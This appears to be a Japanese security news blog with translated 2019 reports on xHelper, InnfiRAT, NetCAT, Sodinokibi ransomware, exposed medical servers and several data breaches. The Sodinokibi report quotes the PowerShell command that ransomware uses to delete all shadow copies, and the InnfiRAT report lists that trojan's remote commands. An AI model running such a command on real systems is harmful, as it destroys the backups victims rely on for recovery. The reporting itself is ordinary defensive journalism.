セキュリティ情報‥


このページは、以下のサイトの和訳を中心として、セキュリティ関連のニュースを発信していくことにします。

Archive
2007まで
2008年
2009年
2010年
2011年
2012年
2013年
2014年
2015年
2016年

    セキュリティ・メーカー関連
  • ・ Emsisoft : Blog
  • ・ ESET WeLiveSecurity
  • ・ Kaspersky SecureList
  • ・ Websense Security Labs
  • ・ McAfee Blog Central
  • ・ Sophos Naked Secuirty
  • ・ Bitdefender : HOTforSecuirty
  • マスメディア
  • ・ BBC
  • ・ The Washington Post
  • ・ The Gurdian
  • ・ The Register
  • 情報サイト等
  • ・ Graham Cluley
  • ・ Krebs on Security
  • ・ The PC Informant
  • ・ BleepingComputer


気をつけろ! このAndroidマルウェアは工場出荷状態に戻しても削除することができない
Fossbytes : News(2019/10/30)
 Malwarebytesは、今までに45,000のAndroidデバイスに感染した新しいマルウェア株を特定した。xHelperと名付けられたこのマルウェアは、未だ7ヶ月しか経っていないが、8月の1ヶ月で既にMalwarebytesのマルウェアのTop 10リストの仲間入りを果たしている。セキュリティ研究者によると、このマルウェアは、自分自身を偽装し、あらゆる種類のアンチウィルスを回避するための最も効果的な方法の一つを身に付けている。

アプリケーションのサイドローディングを可能にしているWebサイトによって拡散している

 Symantecは、このAndroidマルウェアが、ユーザのデバイス上のアプリケーションをサイドロード(【訳注】 新しいデバイスでサポートされなくなってしまったアプリをインストールしたい場合、Google Play経由ではなくPCからマニュアル操作でアプリをデバイスにインストールする方法(lifehackerより))することを可能にしているWebサイトによって押し付けられると明らかにしている。ユーザがサードパーティのWebサイトからアプリケーションをインストールすると、xHelperトロイは、ターゲットのスマートフォンにインストールされる。
 インストールされると、このトロイは、頻繁にポップアップと通知を表示するようの動作する。SymantecとMalwarebytesの双方が実施した調査によると、xHelperマルウェアは、感染者の個人情報を損失させる可能性のある悪意ある挙動は行なわない。
 このマルウェアは、感染者にゲームをしたり、他のアプリケーションをダウンロードしたりするように促してくる。このマルウェアの背後にいるグループは、広告をクリックさせたり、他のアプリケーションをインストールさせたりすることで金銭を得ようとしている。

工場出荷状態に戻しても削除できない

 このマルウェアの最も興味をそそることの一つは、その背後にいる悪の行動主体が、スマートフォンからこのマルウェアを削除することが不可能に近いことを保証していることである。このマルウェアは、暗号化を使用して自分自身を難読化している。Malwarebytesによると、xHelperアプリケーションには、セミステルスとフルステルスの二つの変種がある。両方の変種共、アプリケーションアイコンを作成しない。これは通常のユーザが発見することをより困難にしている。アイコンやショートカットがないことは、あなたが、この頻繁に通知を発生させるアプリケーションをアンインストールできないことを意味している。
 このマルウェアに気がつく唯一の方法は、このマルウェアがセミステルス・モードで稼働している時に表示される通知アイコンである。フルステルス・モードでは、感染者のデバイスで、このマルウェアを検出する唯一の手段であるこの通知を表示することさえしない。

xHelperは、デバイスの起動。ネットワーク接続のような特定のアクションが呼び出された時に自動的に稼働するようにコーディングされている。一旦、フォアグラウンドサービス(【訳注】 通常のサービスと違い、通知を表示し、バックグラウンドで実行している事をユーザに認識させた状態で実行するもの(Qiitaより))として処理が開始されると、このマルウェアは、xHelperトロイを抱き合わせていたアプリケーションを削除しても、このマルウェアを削除することはできない。
 Symantecの研究者は、工場出荷状態に戻しても、あるいは、ユーザがこのサービスを手動で停止することを決定した後でさえ、このマルウェアがどのようにしてデバイス上に残るのかを未だ発見できていない。

サイドローディング・アプリケーションを回避せよ

 このマルウェアがデバイスに感染すると削除する方法が存在していないので、アプリケーションのサイドローディングを許可しているWebサイトを回避することが適切である。また、インターネットの閲覧中にリダイレクトされるリンクに注意しなさい。デバイスを安全に保つために、怪しいポップアップをクリックしないようにしなさい。


Yatron, WannaCryFake, FortuneCrypt身代金要求型マルウェア用の復号プログラムがリリースされた
BleepingComputer : News>Security(2019/09/25)
 セキュリティ企業が、3つの身代金要求型マルウェア感染用の復号プログラムをリリースした。これらの身代金要求型マルウェアの犠牲者は、無料で感染者のファイルを復号することができる。これらの復号プログラムは、WannaCryFake, Yatron, FortuneCrypt身代金要求型マルウェア感染用である。
 これらの身代金要求型マルウェアの亜種のオンライン上での活動は殆ど見られていないが、たとえ一人のユーザであろうともファイルを無料で取り戻すことができたら、それは勝利である。

EmsisoftがWannaCryFakeの復号プログラムをリリースした

 Emsisoftは、WannaCry Fake身代金要求型マルウェア用の復号プログラムをリリースした。この身代金要求型マルウェアは、暗号化したファイルに .wannacry 拡張子を付けることによって悪名高いWannaCryに便乗しようとした。

 「WannaCryFakeは、犠牲者のファイルの暗号化にAES-256を使用する身代金要求型マルウェア株である。WannaCryFakeによって暗号化されたファイルは、ファイル拡張子 “.[][recoverydata54@protonmail.com].WannaCry” を付けられる」

 感染させられたユーザは、以下のような脅迫文を見ることになる。

WannaCryFakeの脅迫文(画像をクリックすると拡大します)

 あなたが、この身代金要求型マルウェアによって暗号化されたのであれば、この復号プログラムをダウンロードし、ファイルを無料で復号することができる。

KasperskyがYatronとFortuneCrypt用の復号プログラムをリリースした

 Kasperskyは本日、YatronとFortuneCrypt身代金要求型マルウェアの復号プログラム(暗号化アルゴリズムの弱点を利用)をリリースした。
 我々は、Yatronに関しては、彼らがRansomware-as-a-Service(RaaS、【訳注】 不正プログラムのランサムウェアを「サービス」として提供するもので、この「サービスの利用者」は、この RaaS を使って、新たなランサムウェアを簡単に作成することができる(Trendmicroセキュリティブログより))の宣伝を始めた時に取り上げている。この身代金要求型マルウェアに感染した者は、暗号化ファイルに .Yatron拡張子を付けられている。

Yatronで暗号化されたファイル(画像をクリックすると拡大します)

 この身代金要求型マルウェアはHiddenTear(暗号化に弱点があることが知られている)を元にしているので、Kasperskyは、それ用の復号プログラムを作成できると宣言していた。Kasperskyによると、この身代金要求型マルウェアの殆どの犠牲者は、ドイツ、中国、ロシア連邦、インド、ミャンマーである。

 「この身代金要求型マルウェアの作者は、上述した最初のシナリオを選択し、オープンソースの身代金要求型マルウェアのサンプルとして著名なHiddenTearで使用されているコードの『創作物』に基づいている。我々の統計によると、昨年だけでも、ドイツ、中国、ロシア連邦、インド、ミャンマーで記録された、Trojan-Ransom.MSIL.Tearの様々な変種による600を超える感染を防御した。」

 Kasperskyはまた、大部分がロシア連邦、ブラジル、ドイツ、韓国、イランを標的にしたFortuneCrypt身代金要求型マルウェア用の復号プログラムをリリースした。

 「昨年の間、我々の製品は、悪意あるTrojan-Ransom.Win32.Cryprenファミリー(FortuneCryptは、このファミリーの一つである)の多くの変種によって実行された6000を超える攻撃を記録した。このマルウェアによって攻撃されたトップ5の国々は、ロシア連邦、ブラジル、ドイツ、韓国、イランである。」

 この身代金要求型マルウェアは、暗号化されたファイル名に拡張子を付けないので、犠牲者が最初に警告されるのは、以下に示す脅迫文を見た時である。

FortuneCrypt(画像をクリックすると拡大します)

 あなたが、YatronもしくはFortuneCrypt身代金要求型マルウェアに感染させられているのであれば、Kasperskyの復号プログラムを彼らのサイトから直接もしくは、No More Ransomダウンロードすることができる


4億の医用放射線画像がインターネット上に晒されている
BleepingComputer : News>Security(2019/09/18)

 パブリックWebに晒されていた医用画像保管システムの解析は、52カ国のおよそ600のサーバが、不正アクセスに対し全く保護されていなかったことを明らかにした。
 監査されたシステムは、数千の脆弱性に対してパッチが当てられていなかった。これらの脆弱性の内500を超えるものは、最高ランクの緊急度スコアだった。

多大で気にかかる数字

 ドイツに本拠を置く脆弱性解析とマネージメント企業であるGreenbone Networksは、パブリック インターネットに接続されている2300のPicture Archiving and Communication System (PACS、【訳注】 正確に定義された日本語はないが「医用画像保管電送システム」と呼ばれる(東海大学大磯病院・医学豆知識より)) システムを検証し、極秘情報の公開という重大な問題を発見した。
 PACSは、医療分野で使用され、X-Ray, CT, MRIのような画像診断デバイスから取得された医用情報を保管し提供するものである。医用画像データは、送信、保管、取得、印刷、処理、表示するためにDICOM(ダイコム、Digital Imaging and Communications in Medicine)標準規格が使用される。
 7月中旬から9月初旬の間パブリックデバイス検出エンジンを使用して、Greenbone Networksは、インターネットを介して接続可能な590のPACSサーバを特定し、2430万の患者の記録を取得することが可能であった。
 殆どの記録は、以下の個人情報と医用情報の詳細を含んでいた:

・ 姓名
・ 誕生日
・ 検査日
・ 検査範囲
・ 画像検査法の種類
・ 主治医
・ 研究所/クリニック
・ 生成された画像の数

 攻撃者は、最終目標としての金銭の見返りのある、より効果的なソーシャルエンジニアリングとフィッシング攻撃を配備するために、この情報を使用することができる。
 この研究者達は、世界中のオープンPACSサーバからデータを引き出すためにRadiAnt DICOM Viewerをセットアップした。7億3350万画像の中から、3億9950万画像がダウンロードでき閲覧できた。
 ヨーロッパでは、イタリアが影響を受けるシステム 10 の最高数を記録していると共に、リークされている医療情報の最高数も記録している。

 北米で最も懸念される保護されていないPACSは米国である。
 米国はまた、晒されているデータセットの最高数(1370万)、それに付随する医用画像の最高数(3億を超える)と晒されているマシンの最高数(187)を記録している。

 南アメリカでは、ブラジルが突出しており、64万データセット、3110万画像、34のリークサーバが検出されている。

 アジアでは、オープンマシンの最高数はインドだが、トルコはデータレコードの数(490万)と、それに付随する医用画像数(1億7900万)での突出が懸念される。
 インドは、保護されていないPACSが凡そ100あり、1億500万の画像の付随する62万7000レコードが晒されている。

1万超の同定された脆弱性

 このレポートは、監査対象のシステムが、1万を超えるセキュリティ問題(20%が緊急度 高 とラベルされている)に直面していることを明らかにしている。
 それらのうちの500は、Common Vulnerability Scoring System (CVSS、共通脆弱性評価システム)で最高ランク(10段階評価の10)に必要な条件を全て満たしている。
 研究者達は、同定された脆弱性の一部が、数年前のものであると指摘しているが、公開されたレポートでは更なる詳細は提供されていない。承認された組織にあっては、300MBの大きなバージョンが利用できる。

 このような問題の他に、この監視システムは、45のPACSが、DICOMの代わりにHTTPやFTPのような危険なプロトコルを介してデータを提供していたことを発見している。即ち、それらに保管されているデータは、認証なしにアクセスすることができる。
 これらの一つは、ディレクトリ一覧で利用できるDICOMアーカイブ ファイルを持っていたので、Webブラウザ経由で誰もがアクセスすることが可能であった。
 この種のデータが晒されていたことに伴うリスクは明らかである。 最も明白なのは、標的型攻撃、恐喝の企て、さらには医療や健康保険の詐欺のために医療情報を盗むことである。
 米国保健福祉省(HHS)の4月のレポートでは、ダークWeb上の健康記録の平均的な金額は、250USDであるが、1,000USDになる可能性もあるので、サイバー犯罪者はこの種の情報に間違いなく関心を持っているとしている。


InnfiRATマルウェアはLitecoinとBitcoinのウォレット情報を盗める
BleepingComputer : News>Security(2019/09/14)
 InnfiRATと名付けられたリモートアクセス・トロイの木馬(RAT)は、暗号化通貨のウォレットデータを含む機密情報を盗む幅広い能力が備わっている。ZscalerのThreatLabZチームは、その内部動作を詳細に調査したが、このマルウェアは暫く前からオンライン上に存在している。
 初期のこのRATは、セキュリティ研究者James_inthe_boxによると、2017年11月に見つけられたが、真面目に解析されたのは、これが最初である。
 InnfiRATは、ThreatLabZチームが発見した .NETマルウェアであり、anti-VMとプロセスチェック(通常はマルウェア解析に使用され、マルウェアがSandbox化された環境で実行されている時にマルウェアの検出を支援するように設計されている)を搭載している。
 ターゲットのコンピュータに感染すると、InnfiRATは、それ自身を%AppData%/NvidiaDriver.exeにコピーし、メモリ中のBase64でエンコードされたPEファイルに書き込む。このファイルは、このマルウェアの実際の機能を備えた他の .NETバイナリに復号される。

永続性と分析防止手段

 このRATは、Sandbox中で稼働していることを発見されると、それ自体を自動的に終了する。そうでなければ、セキュリティ侵害したマシンのHWID(【訳注】 ハードウェアID、Windowsを使用して、INFファイルをデバイスに一致するベンダ定義の識別文字列(Microsoft Docsより))と、国名を収集する。
 InnfiRATはまた、Process Hacker, Process Explorer, Process Monitorのようなプロセスを監視するために使用されるツールのプロセスを発見すると、それ自体を終了する。
 幾つかのWebブラウザのプロセス(即ち、Chrome, Yandex, Kometa, Amigo, Torch, Orbitum, Opera, Mozilla)も数え上げられる。これらのプロセスは、発見されると直ちにKillされ、収穫を容易にするためにユーザプロファイルをアンロックする可能性がある。
 このマルウェアはまた、このRATが発見されKillされた場合に備えて、悪意ある %AppData%/NvidiaDriver.exe 実行ファイルを毎日実行するスケジュールタスクを作成している。

特定のプロセスをチェックしている(画像をクリックすると拡大します)

暗号化通貨とクッキーを盗む

 InnfiRATのコマンド・アンド・コントロール(C2)サーバーは、11種類のコマンドを送信することができるが、最も興味を惹くものは、BitcoinとLitecoinのウォレットデータ並びに、偵察段階でKillしたWebブラウザからクッキー情報を検索し盗むものである。
 このRATは、%AppData%\Litecoin\ と %AppData%\Bitcoin\ フォルダ中でwallet.datファイルを検索する。発見されると直ちに収集され、このマルウェアのC2サーバに伝えられる。
 「InnfiRATは、格納されているユーザ名とパスワードを盗むためにブラウザのクッキー並びに、機密データを取り込む。更に、このRATは、スクリーンショットの機能を持っているので、開いているウィンドウから情報を取得できる」ことを、Zscaler ThreatLabZチームは発見している。
 「InnfiRATは、収集したデータを、そのC2サーバーに送信し、さらなる指示を要求する。C&Cはまた、感染したシステムに追加のペイロードをダウンロードするようにマルウェアに指示する。」

Bitcoinウォレットデータを検索している(画像をクリックすると拡大します)

 2,097,152バイト未満のテキストドキュメントもまた、それらが犠牲者のデスクトップに保存されていた場合には、このマルウェアによって収集され、そのC2サーバに格納されている同じ山のような流出データに対して送信される。
 InnfiRATのオペレータは、既に上述したコマンドに加え、以下のコマンドを送信することもできる。

・ SendUrlAndExecute(string URL) - 指定されたURLからファイルをダウンロードし、それを実行する
・ ProfileInfo() - ネットワーク、ロケーション、ハードウェア情報を収集し漏洩する
・ LoadLogs() - ファイルを指定のファイルに記述する
・ LoadProcesses() - 実行されているプロセスのリストを取得し、それをC2サーバに送信する
・ Kill(int process) - 犠牲者のマシン上の特定のプロセスをKillするためのコマンド
・ RunCommand(string command) - 犠牲者のマシン上でコマンドを実行する
・ ClearCooks() - 特定のブラウザのブラウザクッキーを消去する

 このRATをドロップするために使用されたマルウェアサンプルハッシュとドメインとC2サーバを含む痕跡情報(Indicators of compromise、IOC)は、ThreatLabZチームのInnfiRATの書き込みの末尾で得られる。
 先月、二つの新しいRATがセキュリティ研究者によって発見された。一つは、このRATを発見したESETの研究者によってBalkanRATと名付けられ、RATペイロードを使用した金融に関心を持つ脅威の主体によって実行された作戦の一部として幾つかの国々をターゲットにしたものである。
 他のLookBackと呼ばれるドキュメント化されていないRATは、Proofpoint Threat Insight Teamによって発見され、公益事業部門の3つの米国の組織をターゲットにしたスピア-フィッシング(【訳注】 詐欺行為をけしかける対象に合わせて手口をカスタマイズする詐欺(Weblioより))キャンペーンを介し拡散している。


新しいNetCAT攻撃は、IntelのCPUから極秘データをリークすることができる
BleepingComputer : News>Security(2019/09/11)
 NetCAT(Network Cache ATtack)と名付けられた脆弱性は、2012年以降のIntelの全てのサーバーグレード プロセッサに影響を与え、このネットワークを介してサイドチャンネル攻撃を仕掛けることで極秘データをスニッフィング(【訳注】 ネットワーク上のデータを傍受すること)することができる。
 アムステルダム自由大学のVUSecグループの研究者は、その情報がIntelのData Direct I/O (DDIO、【訳注】 処理速度向上と消費電力削減を実現する技術)が有効になっているシステムのCPUキャッシュに存在していることを発見した。

DDIOは、Intelのサーバーグレード プロセッサ特有のものであり、2012年以降のIntel Xeon E5, E7, SPファミリーではDefaultでONになっている。
 この目的は、ネットワークデバイスや周辺機器とCPUキャッシュを共有し、高速ネットワーク中のサーバアプリケーションのパフォーマンスを向上させるためである。
 NetCATは、リモートマシンのCPUのLast-Level Cache(【訳注】 CPUから見て一番遠いキャッシュメモリのこと(Wikipediaより))中のデータを推測するために配備される。VUSecの研究者は、ネットワーク上のマシンを制御している攻撃者が、ターゲット上で悪意あるソフトウェアを実行することなく、SSHセッションから機密データを推測するためにこの方法を使用できることを示した。

攻撃のトポロジー

 「より正確には、NetCATで、我々は、リモートキャッシュ サイドチャンネルを使用してSSHセッションから個別のネットワークパケットの到着時刻をリークすることができる。」 DDIO中のキー プロパティをリバースエンジニアリングすることで、この研究者は、このキャッシュが共有されている方法を学習した。この知識と、ネットワークカードや他のサーバーサイド周辺機器をスパイすることで、ネットワーク上のクライアントがサーバに接続するために SSHを使用した時、彼らがCPUキャッシュ中のアクセス時刻を監視することが可能になる。
 本日の投稿で、VUSecは、対話型のSSHキーでは、ネットワークパケットはキーを押す度に送信されると説明している。NetCATで、攻撃者は暗号化されたSSHセッションの内部でタイプされた文字を推測することができる。
これは、文字に対応するネットワークパケットの到着時刻を監視することによって可能である。研究者は、人々が特定のタイピング パターンを持っていることと、これが解析の役に立つという事実も活用している。

 「例えば、'a'の直後に's'をタイプすることは、's'をタイプした後に'g'をタイプするより高速である。NetCATは、あなたがプライベートSSHセッション中でタイプしたことをリークするために、キーストローク タイミング攻撃として知られるパケットの到着時間間隔の統計分析を実行することができる。」

 データのタイプを決定するために、研究者は時間をキーストロークにマップするために機械学習(【訳注】 データから反復的に学習を行い、パターンや特徴を見つけ出して未知のデータに対して予測を行う技術(Classmethodより))を始めた。
 研究の詳細は、論文"NetCAT: Practical Cache Attacks from the Network"で利用できる。
 これらの攻撃のデモンストレーションは、SSHセッションからのキーストロークが遠隔でリークできる方法を示している。

 Intelはこの問題を認識しており、この問題は、CVE-2019-11184として追跡される。公開と技術的詳細に関する報奨金が授与された。
 Intelは、Intel DDIOとRDMA(Remote Direct Memory Access)が有効になっているセキュリティで保護されたネットワークでは、強力なセキュリティコントロールを推奨している。この警告にも拘わらず、この脆弱性のCVSS基本値は2.6/10と低い値になっている。
追加の推奨事項は、信頼できないネットワークからの直接アクセスを制限することと、「一定時間型コードを使用するような、時間間隔攻撃に抵抗力のあるソフトウェアモジュール」を使用することである。
 そうは言うものの、NetCATは、最初のネットワークベースのCPUサイドチャンネル攻撃として歴史に刻まれるだろう。


数億のFacebookユーザの電話番号がインターネット上に放置されていたことが発見された
Tripwier : The State of Security(2019/09/05)
 TechChurchは、セキュリティ研究者がFacebookユーザに関連する総数4億1900万を超えるレコードが付属するデータベースを含むサーバが晒されていることを偶然に発見したとレポートしている。
 TechChurchのレポートによると、各データベースのレコードは、ユーザの一意のFacebookアカウントID(ユーザ名を特定することが可能)と、其のアカウントに付随する電話番号を含んでいる。このデータの宝庫には、米国が拠点のFacebookユーザの1億3300万レコード、英国Facebookユーザから1800万レコード、ベトナムFacebookユーザからの5000万レコードが含まれている。
 最悪なのは、サーバー上にパスワードプロテクションが存在していないので、文字通りインターネット接続できる誰もが極秘情報にアクセスすることができたことである。

晒されていたデータベースの一部(画像をクリックすると拡大します)

 ハッカーがデータを収集するためにFacebookをセキュリティ侵害したとするものは誰もいない。更に、晒されていたデータベースはFacebook自体によって使用されているサーバ上には発見されていない。しかし、おそらく、このデータは、おそらくFacebookアカウントに接続するアプリケーションを作成したサードパーティーが、数百万のFacebookユーザプロファイルから抽出したものである。このデータスクレイピングは、間違いなく何が発生しているのか認識していないユーザや、許可されていることの意味を理解していないユーザの役に立っていた。  Facebookのスポークスマンによると、晒されていたデータは、Facebookがユーザの電話番号へのアクセスを制限する前に収集されたものである。

 このデータセットは古いものであり、昨年、我々が、電話番号を使用して誰かが他人を特定する機能を削除するように変更する前に取得された情報のようである。このデータセットは削除された。そして、我々はFacebookアカウントがセキュリティ侵害されたという証拠を何ら確認していない。

 しかしながら、データが初めに数年前に収集されとする発言は的はずれである。人々が数年間同じ電話番号を持ち続けることは珍しいことではない。そして、Facebookのようなオンライン企業が、過去にデータの予防手段が不十分であったのなら、現在及び今後数年、依然として潜在的な問題が存在する。
 犯罪者が電話番号を知ると、彼らはあらゆる種類の損害を与えることができる:
    ・ 犯罪者は、あなたがにフィッシングサイトに導いたり、マルウェアにさえ導く不要なメッセージをスパムできる。
    ・ 犯罪者は、あなたが顧客である企業(例えば、携帯電話事業者のような)であることを装って電話することができる。
    ・ あなたが取り分け価値のあるターゲットであるのなら、そうと決めたハッカーは、あなたのスマートフォンをスパイウェアで感染させたり、あるいはデータを盗むために未パッチの脆弱性をセキュリティ侵害しようとするかもしれない。
    ・ 犯罪者は、一般にSIMスワップ攻撃と呼ばれるものを介して、携帯電話事業者を欺き、番号の所有権を付与するように試みることができる。 番号がハイジャックされると、犯罪者は携帯電話番号に関連付けられた被害者のオンラインアカウントのパスワードをリセットすることができる。
    ・ 他にも沢山...
 特定の個人の携帯電話番号の決定が可能なことは、詐欺師やハッカーにとっては情報の貴重な部分である。そして、数百万の携帯番号のデータベースは、明らかに犯罪者の一部にとっては関心事である。
 これはトラブル続きのFacebookに関連するセキュリティとプライバシーへの懸念に関する一つの新事実である。この企業は否定的な見出しから自分自身を守ることができないようである。
 Cambridge Analyticaの大失敗のような幾つかの事実は、メディア、規制当局、政府中に同様に懸念を引き起こす。これは、最早忘れられているかのような、5億を超えるFacebookのレコードがサードパーティーの開発者のずさんなセキュリティに起因して、インターネット上に晒されたまま(パスワード無し)だった今年初めのインシデントと同じである。
 Mark Zuckerbergは、今年初め「未来はプライベートなものになるはずです」と発言し、Facebookは、よりプライバシーに重点を置くことに全力を捧げると主張した。この声明は、ネットワークの大雑把な歴史を考慮し、私自身(GRAHAM CLULEY)を含むオブザーバによって懐疑的に扱われた。
 答えられていない質問が残っている: 「未来はプライベートなものになるはずです」というFacebookの主張が、信じられるか否かにかかわらず、Facebookが既に行われた損害を修復するのは、実際にはあまりに遅すぎるのだろうか?


身代金要求型マルウェアSodinokibiは、ハッキングしたサイトのインチキフォーラムを介して拡散している
BleepingComputer : News>Security(2019/09/02)
 Sodinokibi身代金要求型マルウェアの拡散者は、WordPressサイトをハッキングし、オリジナルのサイトのコンテンツの上に、インチキのQ&Aフォーラムへの投稿を表示するJavaScriptを挿入している。このインチキの投稿は、サイトの"admin"からの"Answer"を含んでいる。そして、この"Answer"には、身代金要求型マルウェアのインストーラへのリンクを含んでいる。
 セキュリティソフトウェアと人々が、身代金要求型マルウェアとマルウェアを拡散するために使用される方法を認識するようになると、この攻撃で利益を上げている者共は、犠牲者に感染するための巧妙な方法を考案する必要がでてくる。
 このことは、ハックしたサイトのコンテンツの上にインチキのQuestions and Answersフォーラムを被せる新しい拡散方法にも当てはまる。このインチキのフォーラムの投稿は、ユーザが訪問するであろうページのコンテンツに関連する情報を含んでいるので、admin(管理者)によって提供される答えとリンクは正当なものであるかのように見える。
 しかしながら、実際には、このダウンロードされたファイルは、Sodinokibiもしくは、REvil身代金要求型マルウェアでユーザに感染する。

インチキのQ&Aを被せる攻撃の動作方法

 BleepingComputerは、複数の犠牲者がこの方法で感染させられたことを確認したAuraによって、この新しい攻撃方法を最初に警告された。以下に、我々は、この攻撃の動作方法と、Sodinokibiもしくは、REvil身代金要求型マルウェアをインストールするプロセスの全般的な概要を提供する。
 以前のEITest Chrome HoeflerText Font Update攻撃に似て、この攻撃で利益を上げている者共は、サイトをハッキングし、以下に示すようにJavaScriptをそのHTML中に挿入する。挿入されたURLは、全ての訪問者でアクティベートされるが、初めての訪問者や、そのサイトに一定時間行っていないユーザは、そのデータが含まれるだけである。

被せて挿入されたJavaScript(画像をクリックすると拡大します)

 初めてこのサイトを訪問した時、このスクリプトは、下に示すようにコンテンツの上に被せてインチキのQuestions and Answersフォーラムへの投稿をフランス語で発生させる。

インチキのQuestions and Answers Forumへの投稿(画像をクリックすると拡大します)

 ユーザにとって、このフォーラム投稿の内容は、インチキではあるものの通常のサイトのように見える(上図)が、ハッキングされたページの内容に関連しているものであり、実際にはスクリプトによって作成され被されたものである。
 ユーザがもう一度そのページをリフレッシュしても、このスクリプトは発動せず、通常のページが表示される(この記事の末尾にあるデモビデオ参照)。
 ユーザがこのページをリフレッシュしない場合は、他の訪問者がコピー機の「契約の終了」の雛形について、このサイトにフランス語で質問を投稿したかのように見える。

 "Hello, I am looking to download letter of termination contract photocopier model. A friend told me he was on your forum. Can you help me?"

 こんにちは、コピー機契約の終了に関する通知書の雛形をダウンロードしたいと思っている。友人は、あなたのフォーラムにあったと私に告げた。手伝ってもらえますか?

 質問に対する回答で、インチキの回答が、Adminによって提供され、要求されている契約への直リンクが提供される。

 "Here is a direct download link, model letter of termination contract photocopier."

 こちらが、コピー機契約終了の通知書の雛形へのダウンロード直リンクです。

 ユーザが、このリンクをクリックすると、攻撃者の支配下にある任意のハッキングされたサイトから、ZIPファイルがダウンロードされる。この特定の例においては、このファイルは、"modele_de_lettre_de_resiliation_contrat_photocopieur.zip"と名付けられており、解凍すると同じ名前のJScriptファイルが含まれている。

JScriptインストーラ(画像をクリックすると拡大します)

 このJScriptは、リモートサーバに接続する難読化されたコードを含んでいる。そして、このサーバは大量のデータで答えてくるだろう。

キャプション(画像をクリックすると拡大します)

 このデータは、かなり時間がかかるが復号され、%UserProfile%フォルダにGIFファイルとして保存される。このファイルは、多少難読化されたPowerShellコマンドが含まれている。そしてこれは、ReadAllText.Replace関数を使用して、そのファイルから、あらゆる ~ 文字を削除することでクリーンにされる。

PowerShellコマンドから ~ 文字を削除

 これは、結果としてクリーンなPowerShellコマンドになるが、次に、コンピュータを暗号化するためのSodinokibi DLLを実行するために使用される。

難読化を解除されたGIFファイル(画像をクリックすると拡大します)

 暗号化プロセスの間に、この攻撃者は、以下のPowerShellコマンドを使用してシャドーボリュームコピーを除去する。

Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

 終了すると、この犠牲者のファイルは暗号化され、脅迫文が、復号プログラムを購入する方法に関する情報を含むTor支払いサイトに犠牲者を導く。

Sodinokibi Tor支払いサイト(画像をクリックすると拡大します)

 このような攻撃から自分自身を保護するには、必ずリアルタイムプロテクション付きの何らかのセキュリティソフトウェアをインストールすることと、末尾に .js 拡張子のある実行ファイルを決して実行しないことである。
 このような被せられたインチキフォーラムの動作方法を確認したい人々のために、BleepingComputerは、デモンストレーションビデオを作成した。


Foxitユーザパスワードの漏洩を含むデータ侵害を公開
BleepingComputer : News>Security(2019/08/30)
 PDFソフトウェアを提供しているFoxit Softwareは、顧客名や企業名、e-Mail、電話番号、パスワードを含む'My Account'サービスユーザの個人情報特定データに、サードパーティーがアクセス可能な最近のセキュリティ侵害について本日公開した。
 Foxitは2001年に創立以来200を超える国々から10万を超える顧客に、このソフトウェアを販売してきたが、この会社が今月公開したプレスリリースによると、現在は世界中に5億2500万ユーザを抱えている。
 「Foxitは、最近彼らのデータシステムに不正アクセスが実行されたと判断した。サードパーティーは、Foxitの'My Account'ユーザデータへのアクセスを獲得した。このユーザデータは、e-Mailアドレス、パスワード、ユーザ名、電話番号、企業名、IPアドレスを含んでいる」と、本日この企業によって公開されたアドバイザリは述べている。

支払い情報は漏洩されていいない

 Foxitによると、無料のメンバーシップ'My Account'サービスは、その顧客に「使用版ソフトウェアのダウンロード、注文履歴、製品登録情報、トラブルシューティングとサポート情報」を提供している。
 しかしながら、セキュリティ侵害されたシステムは、支払いあるいはクレジットカードデータを格納していないので、影響を受けるユーザ全てに関して、支払い情報は、このデータ漏洩インシデントでは漏洩していない。

 このシステムは、ユーザ名、e-Mailアドレス、企業名、IPアドレス、電話番号は保持しているが、他の個人特定データや支払いカードの情報は保持していない。Foxitは、そのシステムに顧客のクレジットカード情報を保持していない。

 この会社はまた、影響を受ける'My Account'ユーザは、e-Mailを介して、このインシデントに関して警告されたと発言している。このe-Mailは、現在漏洩しているリスクの全てに関して彼らに通知するものであり、パスワード再設定フォームへのリンクを含んでいる。

Foxitデータ漏洩通知メール

 Foxitはデータ保護当局と法執行機関にこの漏洩を通知した。そして、当局の調査に協力する予定である。
 この企業は、今回のセキュリティインシデントを詳細な解析を主導し、この企業全体のセキュリティ体制を強化し、将来のセキュリティインシデントに対する適切な安全対策を実施するために、セキュリティ管理企業を雇用した。
 Foxitは、今回のデータ漏洩のリスクを低く見積もらず、警戒しておくように顧客に助言している。他のWebサイトやサービスで彼らのFoxit'My Account'認証を使用している顧客は、不正アクセスを防ぐためにパスワードを変更するように促されている。Foxitはまた、口座情報を確認し、個人情報の盗難を回避するために信用情報を監視するなど警戒を怠らないように助言している。更に、顧客は、詐欺師が詐欺(フィッシング)によって更に情報を収集するために彼らのデータを使用する可能性があることに注意する必要がある。
 Bleeping Computerは、このデータ漏洩によって影響を受けたユーザの数、違反の原因、発見された日付(ユーザデータが公開された期間を含む)に関する詳細をFoxitに問い合わせたが、この記事の公開時点で回答を得ていない。この記事は、Foxitからの回答があり次第アップデートされる。


「協調型の身代金要求型マルウェア攻撃」が、テキサス州の23自治体を襲撃
BleepingComputer : News>Security(2019/08/18)
 テキサス州は現在、州内の地方自治体を標的にした前例のない身代金要求型マルウェア攻撃に晒されている。この攻撃の影響を受ける自治体は少なくとも23にのぼる。
 テキサス州情報資源管理局(Department of Information Resources (DIR))が、この攻撃の対応と調査を主導しているため、現時点で詳細は殆ど分かっていない。テキサス州は、影響を受けている地方管轄区域が、緊急管理部(The Division of Emergency Management)に支援を要請するよう指導する簡単な通知をリリースした。

23は最終的な数字ではない可能性

 この攻撃は、8月16日の朝に始まった。収集された証拠に基づくと、この攻撃は単一の攻撃者によって実行されているようである。
 確認された犠牲者の数は23であり、これは「実際に、あるいは、潜在的に影響を受けた」実数であると、この部署は考えている。
 この攻撃の源は、現在判明していないが、DIR、Texas Division of Emergency Management、Texas Military Departmentのような地元のテキサス州当局が調査中である。
 この調査には、Department of Homeland Security(国土安全保障省)、FBIサイバー部門、Federal Emergency Management Agency(連邦緊急事態管理局(FEMA))のような連邦政府機関も関与している。
 先週の金曜日にリリースされた最初のステートメントで、DIRは、攻撃の源の調査は進行中であるが、優先されることは、影響を受けた自治体への対応と復旧を支援することであると発言している。

 「現在、DIR(テキサス州情報資源管理局)とテキサスA&M大学システムのCyberresponse and Security Operations Centerチームは、最も重大な影響を受けている管理区域に要員等を配備している」

 DIRの追加として、テキサス緊急管理部(TDEM)が、州のオペレーションセンターを介して州の機関と連携して、その努力を支援すると通知しているので、影響を受けている自治体からの要求があれば追加の要員等が提供される。
